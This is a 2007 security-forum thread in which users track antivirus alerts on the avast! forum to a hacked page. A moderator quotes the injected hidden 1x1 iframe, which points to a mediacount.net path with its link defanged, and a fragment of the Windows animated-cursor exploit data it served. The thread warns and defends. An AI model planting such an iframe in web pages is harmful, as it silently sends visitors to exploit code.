Wilders Security Forums  

Go Back   Wilders Security Forums > Other Security Topics > malware problems & news
User Name
Password
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

 
 
Thread Tools Search this Thread
  #1  
Old August 24th, 2007, 05:38 PM
JeremyWW's Avatar
JeremyWW JeremyWW is offline
Frequent Poster
 
Join Date: Apr 2005
Posts: 217
Default Get this folks...

Alwil's credibility just hit the ground floor like an elevator with the wires cut...

Go here and see what NOD32 does: h__p://forum.avast.com/

Last edited by Bubba : August 24th, 2007 at 06:48 PM. Reason: altered link
  #2  
Old August 24th, 2007, 05:47 PM
The_Duality's Avatar
The_Duality The_Duality is offline
Frequent Poster
 
Join Date: Apr 2007
Location: Liverpool, UK
Posts: 274
Default Re: Get this folks...

Quote:
Originally Posted by JeremyWW
Alwil's credibility just hit the ground floor like an elevator with the wires cut...

Go here and see what NOD32 does: h__p://forum.avast.com/

Hmm... surprising, yet common sense says FP.
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm

Last edited by Bubba : August 24th, 2007 at 06:48 PM. Reason: altered link
  #3  
Old August 24th, 2007, 05:49 PM
JeremyWW's Avatar
JeremyWW JeremyWW is offline
Frequent Poster
 
Join Date: Apr 2005
Posts: 217
Default Re: Get this folks...

Possibly, BUT...Avast! itself picks it up...so their own signatures are picking it up on their own site!

Last edited by JeremyWW : August 24th, 2007 at 07:24 PM.
  #4  
Old August 24th, 2007, 05:52 PM
flyrfan111 flyrfan111 is offline
Very Frequent Poster
 
Join Date: Jun 2004
Posts: 1,224
Default Re: Get this folks...

F-Prot flags it also. Starting to sound like a legit detection. It isn't on Avast's site though, you are getting redirected to Media Count. It only works in IE. FF and Opera don't get it, at least on my system.
  #5  
Old August 24th, 2007, 05:57 PM
JeremyWW's Avatar
JeremyWW JeremyWW is offline
Frequent Poster
 
Join Date: Apr 2005
Posts: 217
Default Re: Get this folks...

Exactly, which is why I just uninstalled Avast!, wrote a fairly abrupt e-mail to their research team and came back here looking for sanity! I think I found it in the form of NOD32 AV Beta. I've been a long term NOD32 user and I've been waiting for this...at last...!!!
  #6  
Old August 24th, 2007, 05:58 PM
flyrfan111 flyrfan111 is offline
Very Frequent Poster
 
Join Date: Jun 2004
Posts: 1,224
Default Re: Get this folks...

Run an On Demand Scan and then look at your log.
  #7  
Old August 24th, 2007, 06:04 PM
The_Duality's Avatar
The_Duality The_Duality is offline
Frequent Poster
 
Join Date: Apr 2007
Location: Liverpool, UK
Posts: 274
Default Re: Get this folks...

Oooer

This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm
  #8  
Old August 24th, 2007, 06:04 PM
JeremyWW's Avatar
JeremyWW JeremyWW is offline
Frequent Poster
 
Join Date: Apr 2005
Posts: 217
Default Re: Get this folks...

Quote:
Originally Posted by flyrfan111
Run an On Demand Scan and then look at your log.

Doing it now...
  #9  
Old August 24th, 2007, 06:09 PM
flyrfan111 flyrfan111 is offline
Very Frequent Poster
 
Join Date: Jun 2004
Posts: 1,224
Default Re: Get this folks...

Quote:
Originally Posted by The_Duality
Oooer

This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.

I only get it in IE, not in FF, perhaps that ad blocking plug in stops it.
  #10  
Old August 24th, 2007, 06:12 PM
JeremyWW's Avatar
JeremyWW JeremyWW is offline
Frequent Poster
 
Join Date: Apr 2005
Posts: 217
Default Re: Get this folks...

Quote:
Originally Posted by JeremyWW
Doing it now...

In depth scan finished: Clean machine...
  #11  
Old August 24th, 2007, 06:15 PM
flyrfan111 flyrfan111 is offline
Very Frequent Poster
 
Join Date: Jun 2004
Posts: 1,224
Default Re: Get this folks...

Quote:
Originally Posted by JeremyWW
In depth scan finished: Clean machine...


Look at the log, do you have a bunch of "internal errors"?
  #12  
Old August 24th, 2007, 06:18 PM
raven211's Avatar
raven211 raven211 is offline
Very Frequent Poster
 
Join Date: May 2005
Posts: 2,276
Default Re: Get this folks...

Haven't made a scan yet - might do it later, just to see if NOD32 picks something up in general. I got the warning/infection message in Opera though.
  #13  
Old August 24th, 2007, 06:20 PM
The_Duality's Avatar
The_Duality The_Duality is offline
Frequent Poster
 
Join Date: Apr 2007
Location: Liverpool, UK
Posts: 274
Default Re: Get this folks...

I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm
  #14  
Old August 24th, 2007, 06:20 PM
JeremyWW's Avatar
JeremyWW JeremyWW is offline
Frequent Poster
 
Join Date: Apr 2005
Posts: 217
Default Re: Get this folks...

Quote:
Originally Posted by flyrfan111
Look at the log, do you have a bunch of "internal errors"?

No. I'm looking for that specific string, yes? Nothing...

OK...just one, but nothing to do with anything...

24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error
  #15  
Old August 24th, 2007, 06:21 PM
LoneWolf's Avatar
LoneWolf LoneWolf is offline
Very Frequent Poster
 
Join Date: Jan 2006
Posts: 2,125
Default Re: Get this folks...

Noticed this earlyer.
Thought LSP was giving me a FP.
Maybe not.
Site may have been hacked
I know this has happened to other sites forum and not in the past.
Anyone else can confirm this?
Attached Images
 
__________________
"What a long, strange trip it's been"
  #16  
Old August 24th, 2007, 06:26 PM
flyrfan111 flyrfan111 is offline
Very Frequent Poster
 
Join Date: Jun 2004
Posts: 1,224
Default Re: Get this folks...

Quote:
Originally Posted by The_Duality
I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.

Correct, 2.7 works like a charm.
  #17  
Old August 24th, 2007, 06:27 PM
JeremyWW's Avatar
JeremyWW JeremyWW is offline
Frequent Poster
 
Join Date: Apr 2005
Posts: 217
Default Re: Get this folks...

Quote:
Originally Posted by LoneWolf
Noticed this earlyer.
Thought LSP was giving me a FP.
Maybe not.
Site may have been hacked
I know this has happened to other sites forum and not in the past.
Anyone else can confirm this?

Yup...
Attached Images
 
  #18  
Old August 24th, 2007, 06:28 PM
flyrfan111 flyrfan111 is offline
Very Frequent Poster
 
Join Date: Jun 2004
Posts: 1,224
Default Re: Get this folks...

Quote:
Originally Posted by JeremyWW
No. I'm looking for that specific string, yes? Nothing...

OK...just one, but nothing to do with anything...

24/08/2007 23:03:56 &nbsp:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe ZIP office2003-KB912022-GLB.exe - internal error

I have thousands of them. 228 pages in a word document!!
  #19  
Old August 24th, 2007, 06:30 PM
The_Duality's Avatar
The_Duality The_Duality is offline
Frequent Poster
 
Join Date: Apr 2007
Location: Liverpool, UK
Posts: 274
Default Re: Get this folks...

Hacking is looking quite likely here
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm
  #20  
Old August 24th, 2007, 06:33 PM
flyrfan111 flyrfan111 is offline
Very Frequent Poster
 
Join Date: Jun 2004
Posts: 1,224
Default Re: Get this folks...

Quote:
Originally Posted by The_Duality
Hacking is looking quite likely here

Yup. Sure looks that way(More Likely). Or quite a few different AV's and Link Scanner are giving FPs(Less Likely).
  #21  
Old August 24th, 2007, 06:42 PM
Bubba's Avatar
Bubba Bubba is offline
Global Moderator
 
Join Date: Apr 2002
Posts: 11,260
Default Re: Get this folks...

We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.

<iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>

Thanks
Bubba
Name:  Nod32.gif
Views: 1627
Size:  18.3 KB
  #22  
Old August 24th, 2007, 06:43 PM
The_Duality's Avatar
The_Duality The_Duality is offline
Frequent Poster
 
Join Date: Apr 2007
Location: Liverpool, UK
Posts: 274
Default Re: Get this folks...

I guess it is possible that it could be an FP. it is an ad/media link being flagged, so it may be the way that the Ad/link is implemented that appears malicious. Could happen. *shrugs*
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm
  #23  
Old August 24th, 2007, 06:59 PM
raven211's Avatar
raven211 raven211 is offline
Very Frequent Poster
 
Join Date: May 2005
Posts: 2,276
Default Re: Get this folks...

Hehe.. Just a bit funny though that many others detect it also then.
  #24  
Old August 24th, 2007, 07:02 PM
The_Duality's Avatar
The_Duality The_Duality is offline
Frequent Poster
 
Join Date: Apr 2007
Location: Liverpool, UK
Posts: 274
Default Re: Get this folks...

Thats what I mean. It may be a suspicious implementation of something that is triggering the AV response. Of course, it may most likely be a real threat. Havent seen one in months

Quite exciting to get a real alert for once...
__________________
Last edited by Duality : Today, at 6.50 PM. Reason: Added extra sarcasm

Last edited by Bubba : August 24th, 2007 at 07:11 PM. Reason: fixed my screw up....sorry :(
  #25  
Old August 24th, 2007, 07:15 PM
Bubba's Avatar
Bubba Bubba is offline
Global Moderator
 
Join Date: Apr 2002
Posts: 11,260
Default Re: Get this folks...

Quote:
Originally Posted by The_Duality
Of course, it may most likely be a real threat.
It is a real threat at the moment due to the iframe code and link still available at Avast.

Windows Animated Cursor Stack Overflow Vulnerability

portion of the ani code from the mediacount.net/strong/020sdsfg/324123.htm link

Quote:
RIFFACONanih$$ TSILTSILanih @ 1f8^

We have also moved this to a more appropriate forum so others that visit the Avast Forums can be made aware.

Procede with caution,
Bubba
 

Wilders Security Forums > Other Security Topics > malware problems & news « Previous Thread | Next Thread »

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Settings
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT -4. The time now is 04:31 AM.


Powered by vBulletin Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Copyright 2002 - 2010, Wilders Security Forums